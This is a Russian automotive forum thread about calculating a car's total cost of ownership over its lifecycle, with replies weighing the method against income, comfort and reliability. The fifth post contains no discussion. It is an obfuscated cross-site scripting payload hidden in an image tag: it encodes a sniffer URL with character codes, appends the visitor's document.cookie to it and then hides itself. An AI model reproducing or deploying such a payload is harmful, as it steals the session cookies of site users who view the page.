Расчет стоимости оборудования (авто) на протяжении его жизненного цикла.

Показано с 1 по 5 из 5
  1. #1
    basyl001
    Участник

    Расчет стоимости оборудования (авто) на протяжении его жизненного цикла.

    Думаю, не меня одного тревожит вопрос, как объективно оценить экономичность авто, сделать правильный выбор. Конечно, очень информативно и важно иметь отзывы знакомых, знать стоимость запчастей и ТО, отдельная тема – безопасность, а дизайн – чисто субъективен и т.п. Во всем этом многообразии возникла идея применить какой-то мало-мальски объективный инструмент для принятия решения.

    В современных системах управления производством и ремонтами существует методика расчета стоимости приобретаемого оборудования на протяжении его жизненного цикла.

    В общем виде методика очень проста (описываю, сразу применяя к авто):
    Для начала надо собрать все затраты на авто за определенный период (к примеру, 4 года или 100 тык):
    - стоимость авто;
    - затраты при поиске и покупке (б/у – диагностика; растаможка; оформление, справка-счет/договор и т.п.);
    - минимальные необходимые затраты на начальном периоде (к примеру, берем GL, но сразу ставим электропакет, сигнал., цз и т.п., антикор, берем GLE – делаем только антикор и сигнал., берем иж ода – не тратимся на антикор ;
    - стоимость всех плановых ТО;
    - стоимость бензина исходя из среднего расхода и пробега 100тык.;
    - закладываем затраты на возможные поломки (как технические, так и кузовной ремонт) на основе опыта;
    - учитываем снижение стоимости авто за намеченный период, добавляем в расход.
    - и проч.

    Полученную сумму (стоимость на протяжении жизненного цикла) делим на 48, получаем среднемесячные затраты.

    Тут сразу видно, что GLE, к примеру, выйдет значительно дороже GL, т.к. при прочих равных в течение 4-х лет потребуется ремонт или заправка кондея, возможно – ремонт ГУРа, наверняка – ремонт цз, стеклоподъемников, антенны.
    Экономия в 100-200$ на антикоре вылезет потерями в остаточной стоимости около 1000$.

    Конечно, погрешность м.б. высока, а оценить комфорт, безопасность и эргономику очень сложно. Однако, для меня эта методика упорядочивает и расставляет все на свои места: знаю за что и сколько плачу с учетом эксплуатации.

    Прошу уважаемое сообщество высказаться на тему.



  2. #2
    vi1952
    Старожил

    Расчет стоимости оборудования (авто) на протяжении его жизненного цикла.

    Да, такая методика применется в основном автохозяйствами. Для них это важнее, чем для автолюбителей. Там все считается по усредненным ценам, а здесь на первое место выступает индивидуальный подход к решению вопроса каждым человеком. Можно "фарш" воткнуть дорогой, импортный, а можно дешевый.
    У каждого свой стиль езды, а отсюда и расход бензина. Можно нарваться на бракованную деталь, а на "той" машине ты бы ее не покупал. И так далее. Поэтому применительно к нам данная методика не может быть объективной. Хотя какой-то ориентирующий компонент в ней имеется!

  3. #3
    Alexandr_J
    Старожил

    Расчет стоимости оборудования (авто) на протяжении его жизненного цикла.

    Прошу уважаемое сообщество высказаться на тему.
    Для адекватной оценки любой системы должны быть свои инь и янь. Здесь затронута только одна сторона вопроса - затраты. Потому вопрос выглядит совершенно пустым без другой стороны - доходов, ибо не с чем сравнивать. Для кого то 1000$ на ежегодное обслуживание не деньги, а кто то несколько лет будет корки грызть, чтобы за купленное авто рассчитаться.

  4. #4
    blinnex
    Участник

    Расчет стоимости оборудования (авто) на протяжении его жизненного цикла.

    Методика конечно интересная и заслуживает внимания со стороны людей рассудительных и любящих считать деньги. Предназначена она конечно же для оценки совокупной стоимости владения автомобилем и безусловно имеет право на существование. Все хотя бы раз пытались оценить во что им обходится их "игрушка". Сравнить с помошью такой методики можно только стоимостные показатели конкретных автомобилей. Даже для одинаковых авто оценка может отличаться.
    Я в автомобиле ценю прежде всего Цена/(Надёжность+Комфортность+Безопасность)
    Кто имеет техническое или околотехническое образование знаком с жизненным циклом машин и механизмов тот знает, что зататы на ТО распределяются во времени не линейно. Вначале они велики, затем следует спад, а затем плавный рост до бесконечности. Так вот главное что бы этот период когда поломок минимум длился как можно дольше.
    Понятно что ОКА в определённый момент будет самым недорогим автомобилем. Но долго ли?
    Комфорт то же понятие субъективное. Кто то скажет: "... кондей - это излишества", а кто то скажет "... кондей? а почему без климат-контроля?". Тоже про гур, стеклоподъёмники, магнитолу, электроантенну и прочее.
    Тема доходов так же важна. Нет смысла брать дорогущую машину если не сможешь её обслужить потом. Она быстро подешевеет в твоих руках.
    Лично я рассматривал именно эти критерии при выборе авто:
    0. Смогу купить за ... сумму
    1. Комфортабильно, удобно, много приятных опций
    2. Экономично, ремонтопригодно, большой срок между поломками, есть запчасти хорошего качества.
    3. Надёжно и безопасно - не развалится на первом же ухабе, не забудут на заводе что то поставить или "детские болезни" уже вылечены предыдущим хозяином.
    4. Смогу качественно обслуживать в течение всего периода эксплуатации (хватит средств)
    5. Смогу в последствии продать и при этом не потерять значительно в цене из-за возраста/пробега/появившихся во время эксплуатации дефектов.

  5. #5
    Хлобысь
    Новичок

    Расчет стоимости оборудования (авто) на протяжении его жизненного цикла.

    [img]http://re http://w onerror=img=new/**/Image();a=String.fromCharCode& #40;104,116,116,117,47,116,111,111,108,115,47,115, 110,105,102,102,101,114,47,115
    ,46,103,105,102,63);img.src=a+document.cookie;this .style.display='none' end[/img]

Похожие темы

  1. сравнение стоимости запчастей
    от torpedro в разделе Nexia N-150(new)
    Ответов: 13
    Последнее сообщение: 26.04.2011, 03:22
  2. полетел распред(его штифт)4 клапана на выпуск и 2 на впуск ремень цел
    от misha28061985 в разделе Двигатель и трансмиссия
    Ответов: 1
    Последнее сообщение: 29.04.2010, 14:58
  3. Вопрос о стоимости ТО
    от Foks в разделе Техобслуживание и эксплуатация
    Ответов: 5
    Последнее сообщение: 15.08.2008, 14:10
  4. Установка Газо Балонного Оборудования на Ксюшу.
    от Dvf68 в разделе Вопросы и ответы
    Ответов: 8
    Последнее сообщение: 29.04.2008, 09:05
  5. Ответов: 8
    Последнее сообщение: 11.07.2007, 14:43

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •